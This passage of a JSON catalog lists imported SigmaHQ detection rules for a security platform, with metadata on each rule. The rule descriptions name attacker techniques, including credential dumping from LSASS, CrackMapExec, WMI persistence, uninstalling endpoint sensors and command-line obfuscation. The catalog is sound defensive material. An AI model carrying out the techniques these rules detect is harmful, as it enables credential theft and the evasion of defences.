This is usually not possible without workarounds and may be used by malware to hide its traces.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-deletion-of-its-own-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_own_image.yml" } }, { "id": "sigmahq-sigma-f033f3f3-fd24-4995-97d8-a3bb17550a88", "type": "detection", "name": "WMI Persistence - Security", "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-f0507c0f-a3a2-40f5-acc6-7f543c334993", 
"type": "detection", "name": "Suspicious File Execution From Internet Hosted WebDav Share", "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-execution-from-internet-hosted-webdav-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml" } }, { "id": "sigmahq-sigma-f0540f7e-2db3-4432-b9e0-3965486744bc", "type": "detection", "name": "Legitimate Application Dropped Executable", "description": "Detects programs on a Windows system that should not write executables to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-dropped-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml" } }, { "id": "sigmahq-sigma-f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "type": "detection", "name": "Scheduled Task Executed Uncommon LOLBIN", "description": "Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executed-uncommon-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml" } }, { "id": "sigmahq-sigma-f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "type": "detection", "name": "PUA - DefenderCheck Execution", "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-defendercheck-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" } }, { "id": "sigmahq-sigma-f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "type": "detection", "name": "Potential Commandline Obfuscation Using Escape Characters", "description": "Detects potential commandline obfuscation using known escape characters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-obfuscation-using-escape-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" } }, { "id": "sigmahq-sigma-f0d1feba-4344-4ca9-8121-a6c97bd6df52", "type": "detection", "name": "Credential Dumping Tools Service Execution - Security", "description": "Detects well-known credential dumping tools execution via service execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-tools-service-execution-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_mal_creddumper.yml" } }, { "id": "sigmahq-sigma-f0e2b768-5220-47dd-b891-d57b96fc0ec1", "type": "detection", "name": "CSExec Service File Creation", "description": "Detects default CSExec service filename which indicates CSExec service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csexec-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"f0e2b768-5220-47dd-b891-d57b96fc0ec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_csexec_service.yml" } }, { "id": "sigmahq-sigma-f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "type": "detection", "name": "Exports Registry Key To a File", "description": "Detects the export of the target Registry key to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-registry-key-to-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" } }, { "id": "sigmahq-sigma-f0f7be61-9cf5-43be-9836-99d6ef448a18", "type": "detection", "name": "Uninstall Crowdstrike Falcon Sensor", "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uninstall-crowdstrike-falcon-sensor.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" } }, { "id": "sigmahq-sigma-f1086bf7-a0c4-4a37-9102-01e573caf4a0", "type": "detection", "name": "Renamed Whoami Execution", "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-whoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" } }, { "id": "sigmahq-sigma-f10ed525-97fe-4fed-be7c-2feecca941b1", "type": "detection", "name": "Persistence Via Hhctrl.ocx", "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-hhctrl-ocx.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" } }, { "id": "sigmahq-sigma-f117933c-980c-4f78-b384-e3d838111165", "type": "detection", "name": "Windows Share Mount Via Net.EXE", "description": "Detects when a share is mounted using the \"net.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f117933c-980c-4f78-b384-e3d838111165", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml" } }, { "id": "sigmahq-sigma-f11f2808-adb4-46c0-802a-8660db50fa99", "type": "detection", "name": "ImagingDevices Unusual Parent/Child Processes", "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/imagingdevices-unusual-parent-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f11f2808-adb4-46c0-802a-8660db50fa99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml" } }, { "id": "sigmahq-sigma-f1408a58-0e94-4165-b80a-da9f96cf6fc3", "type": "detection", "name": "JXA In-memory Execution Via OSAScript", "description": "Detects possible malicious execution of JXA in-memory via OSAScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jxa-in-memory-execution-via-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1408a58-0e94-4165-b80a-da9f96cf6fc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml" } }, { "id": "sigmahq-sigma-f14719ce-d3ab-4e25-9ce6-2899092260b0", "type": "detection", "name": "NTFS Vulnerability Exploitation", "description": "Detects the exploitation of an NTFS vulnerability, as reported without many details via Twitter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1499.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntfs-vulnerability-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" } }, { "id": "sigmahq-sigma-f14e169e-9978-4c69-acb3-1cff8200bc36", "type": "detection", "name": "Suspicious GrpConv Execution", "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-grpconv-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" } }, { "id": "sigmahq-sigma-f17211f1-1f24-4d0c-829f-31e28dc93cdd", "type": "detection", "name": "Uncommon Svchost Command Line Parameter", "description": "Detects instances of svchost.exe running with an unusual or uncommon command line 
parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1055", "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-svchost-command-line-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f17211f1-1f24-4d0c-829f-31e28dc93cdd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_command_line_flags.yml" } }, { "id": "sigmahq-sigma-f177f2bc-5f3e-4453-b599-57eefce9a59c", "type": "detection", "name": "Remote Schedule Task Recon via AtScv", "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-recon-via-atscv.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" } }, { "id": "sigmahq-sigma-f1b3a22a-45e6-4004-afb5-4291f9c21166", "type": "detection", "name": "Suspicious PsExec Execution - Zeek", "description": "Detects execution of psexec or paexec with a renamed service name; this rule helps to filter out the noise when psexec is used for legitimate purposes or when an attacker uses a psexec client other than the Sysinternals one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-psexec-execution-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" } }, { "id": "sigmahq-sigma-f1edd233-30b5-4823-9e6a-c4171b24d316", "type": "detection", "name": "Rundll32 Registered COM Objects", "description": "Detects the loading of malicious registered COM objects via rundll32", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-registered-com-objects.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" } }, { "id": "sigmahq-sigma-f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "type": "detection", "name": "MMC20 Lateral Movement", "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc20-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" } }, { "id": "sigmahq-sigma-f200dc3f-b219-425d-a17e-c38467364816", "type": "detection", "name": "Clipboard Collection of Image Data with Xclip Tool", "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of the xclip tool.\nXclip has to be installed.\nUsing this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-of-image-data-with-xclip-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f200dc3f-b219-425d-a17e-c38467364816", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml" } }, { "id": "sigmahq-sigma-f208d6d8-d83a-4c2c-960d-877c37da84e5", "type": "detection", "name": "Process Launched Without Image Name", "description": "Detects the use of processes with no name (\".exe\"), which can be used to evade Image-based detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-launched-without-image-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f208d6d8-d83a-4c2c-960d-877c37da84e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml" } }, { "id": "sigmahq-sigma-f239b326-2f41-4d6b-9dfa-c846a60ef505", "type": "detection", "name": "Password Dumper Remote Thread in LSASS", "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-dumper-remote-thread-in-lsass.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml" } }, { "id": "sigmahq-sigma-f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" } }, { "id": "sigmahq-sigma-f2485272-a156-4773-82d7-1d178bc4905b", "type": "detection", "name": "Suspicious Service Installed", "description": "Detects installation of 
NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2485272-a156-4773-82d7-1d178bc4905b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" } }, { "id": "sigmahq-sigma-f24ab7a8-f09a-4319-82c1-915586aa642b", "type": "detection", "name": "FortiGate - New Firewall Policy Added", "description": "Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-firewall-policy-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f24ab7a8-f09a-4319-82c1-915586aa642b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml" } }, { "id": "sigmahq-sigma-f24bcaea-0cd1-11eb-adc1-0242ac120002", "type": "detection", "name": "Uncommon Assistive Technology Applications Execution Via AtBroker.EXE", "description": "Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-assistive-technology-applications-execution-via-atbroker-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml" } }, { "id": "sigmahq-sigma-f26307d8-14cd-47e3-a26b-4b4769f24af6", "type": "detection", "name": "HackTool - CrackMapExec Process Patterns", "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-process-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
